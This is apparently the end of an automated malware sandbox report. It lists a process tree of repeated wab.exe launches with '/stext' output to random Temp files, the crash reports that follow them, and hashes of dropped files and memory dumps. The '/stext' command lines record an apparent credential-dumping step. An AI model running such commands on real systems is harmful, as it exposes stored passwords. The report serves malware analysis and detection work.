                                                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jepftu"
                                                                      5⤵
                                                                        PID:892
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 12
                                                                          6⤵
                                                                          • Program crash
                                                                          PID:3908
                                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\onipqlksidhqmjhbgeosahqdofgnj"
                                                                        5⤵
                                                                          PID:976
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 12
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:1164
                                                                        • C:\Program Files (x86)\windows mail\wab.exe
                                                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yivirdvtwlzdwpvfppjtlmluptqwdvvtx"
                                                                          5⤵
                                                                            PID:1700
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12
                                                                              6⤵
                                                                              • Program crash
                                                                              PID:3668
                                                                          • C:\Program Files (x86)\windows mail\wab.exe
                                                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\akbss"
                                                                            5⤵
                                                                              PID:1616
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 12
                                                                                6⤵
                                                                                • Program crash
                                                                                PID:4436
                                                                            • C:\Program Files (x86)\windows mail\wab.exe
                                                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vzxkouayfqvbkwwphmjglajl"
                                                                              5⤵
                                                                                PID:3156
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 12
                                                                                  6⤵
                                                                                  • Program crash
                                                                                  PID:3020
                                                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ftccpnkatyngncktrwwhomeurjvs"
                                                                                5⤵
                                                                                  PID:2380
                                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ftccpnkatyngncktrwwhomeurjvs"
                                                                                  5⤵
                                                                                    PID:4484
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 12
                                                                                      6⤵
                                                                                      • Program crash
                                                                                      PID:4952
                                                                                  • C:\Program Files (x86)\windows mail\wab.exe
                                                                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qvhvqfvuhgftxqgxahjjzryksynbyhn"
                                                                                    5⤵
                                                                                      PID:4412
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 12
                                                                                        6⤵
                                                                                        • Program crash
                                                                                        PID:1772
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1396 -ip 1396
                                                                              1⤵
                                                                                PID:540
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4304 -ip 4304
                                                                                1⤵
                                                                                  PID:3972
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4440 -ip 4440
                                                                                  1⤵
                                                                                    PID:4720
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3908 -ip 3908
                                                                                    1⤵
                                                                                      PID:4088
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4420 -ip 4420
                                                                                      1⤵
                                                                                        PID:2916
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5084 -ip 5084
                                                                                        1⤵
                                                                                          PID:4512
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4444 -ip 4444
                                                                                          1⤵
                                                                                            PID:3400
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 452 -ip 452
                                                                                            1⤵
                                                                                              PID:2092
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 3156 -ip 3156
                                                                                              1⤵
                                                                                                PID:1112
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4924 -ip 4924
                                                                                                1⤵
                                                                                                  PID:3100
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2064 -ip 2064
                                                                                                  1⤵
                                                                                                    PID:1704
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4332 -ip 4332
                                                                                                    1⤵
                                                                                                      PID:864
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3120 -ip 3120
                                                                                                      1⤵
                                                                                                        PID:4020
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1832 -ip 1832
                                                                                                        1⤵
                                                                                                          PID:880
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3128 -ip 3128
                                                                                                          1⤵
                                                                                                            PID:1296
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2904 -ip 2904
                                                                                                            1⤵
                                                                                                              PID:4680
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3872 -ip 3872
                                                                                                              1⤵
                                                                                                                PID:4036
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4928 -ip 4928
                                                                                                                1⤵
                                                                                                                  PID:2648
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1624 -ip 1624
                                                                                                                  1⤵
                                                                                                                    PID:2468
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3616 -ip 3616
                                                                                                                    1⤵
                                                                                                                      PID:2008
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4812 -ip 4812
                                                                                                                      1⤵
                                                                                                                        PID:3708
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2756 -ip 2756
                                                                                                                        1⤵
                                                                                                                          PID:3436
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 624 -ip 624
                                                                                                                          1⤵
                                                                                                                            PID:3064
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 892 -ip 892
                                                                                                                            1⤵
                                                                                                                              PID:2160
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 976 -ip 976
                                                                                                                              1⤵
                                                                                                                                PID:2092
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1700 -ip 1700
                                                                                                                                1⤵
                                                                                                                                  PID:4620
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1616 -ip 1616
                                                                                                                                  1⤵
                                                                                                                                    PID:4052
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3156 -ip 3156
                                                                                                                                    1⤵
                                                                                                                                      PID:4548
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4484 -ip 4484
                                                                                                                                      1⤵
                                                                                                                                        PID:4908
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4412 -ip 4412
                                                                                                                                        1⤵
                                                                                                                                          PID:5048

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shf5zc01.yry.ps1

                                                                                                                                          Filesize

                                                                                                                                          60B

                                                                                                                                          MD5

                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                          SHA1

                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                          SHA256

                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                          SHA512

                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Bassistens.Til

                                                                                                                                          Filesize

                                                                                                                                          471KB

                                                                                                                                          MD5

                                                                                                                                          f871d41b68529e905bb07cbb41fc3742

                                                                                                                                          SHA1

                                                                                                                                          218279abe825fcf4f17158e8356edb9f978be794

                                                                                                                                          SHA256

                                                                                                                                          2a3751451d7dbeb778a0f6e9daaba5b4f07e890bcdcdd2ea7ef45158ccd69e8c

                                                                                                                                          SHA512

                                                                                                                                          ad68b3625f62f4cd420e84733daa7b66086217f219625e849944c21516363aa77502b147ebfd49e47f3358480850402601936c7abbb0d404b5f76d94e2dbb4eb

                                                                                                                                        • memory/232-10-0x000001F44E6B0000-0x000001F44E6D2000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/232-11-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/232-12-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/232-44-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.8MB

                                                                                                                                        • memory/232-43-0x000001F44E760000-0x000001F44E97C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          2.1MB

                                                                                                                                        • memory/232-0-0x00007FFE83653000-0x00007FFE83655000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          8KB

                                                                                                                                        • memory/232-39-0x000001F44E760000-0x000001F44E97C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          2.1MB

                                                                                                                                        • memory/1320-17-0x0000000005110000-0x0000000005132000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/1320-18-0x0000000005900000-0x0000000005966000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          408KB

                                                                                                                                        • memory/1320-30-0x0000000005FD0000-0x0000000005FEE000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          120KB

                                                                                                                                        • memory/1320-31-0x0000000006020000-0x000000000606C000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          304KB

                                                                                                                                        • memory/1320-33-0x0000000006560000-0x000000000657A000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          104KB

                                                                                                                                        • memory/1320-32-0x0000000007870000-0x0000000007EEA000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          6.5MB

                                                                                                                                        • memory/1320-35-0x0000000007220000-0x0000000007242000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                        • memory/1320-36-0x00000000084A0000-0x0000000008A44000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          5.6MB

                                                                                                                                        • memory/1320-34-0x0000000007290000-0x0000000007326000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          600KB

                                                                                                                                        • memory/1320-19-0x0000000005970000-0x00000000059D6000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          408KB

                                                                                                                                        • memory/1320-38-0x0000000008A50000-0x0000000009474000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.1MB

                                                                                                                                        • memory/1320-29-0x0000000005AE0000-0x0000000005E34000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          3.3MB

                                                                                                                                        • memory/1320-16-0x00000000051E0000-0x0000000005808000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          6.2MB

                                                                                                                                        • memory/1320-15-0x0000000004A10000-0x0000000004A46000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          216KB

                                                                                                                                        • memory/1396-48-0x0000000000400000-0x0000000000424000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          144KB

                                                                                                                                        • memory/2764-40-0x0000000001F30000-0x0000000002954000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          10.1MB

                                                                                                                                        • memory/2764-86-0x000000001F910000-0x000000001F929000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          100KB

                                                                                                                                        • memory/2764-85-0x000000001F910000-0x000000001F929000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          100KB

                                                                                                                                        • memory/2764-82-0x000000001F910000-0x000000001F929000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          100KB

                                                                                                                                        • memory/4304-47-0x0000000000400000-0x0000000000462000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          392KB

                                                                                                                                        • memory/4440-46-0x0000000000400000-0x0000000000478000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          480KB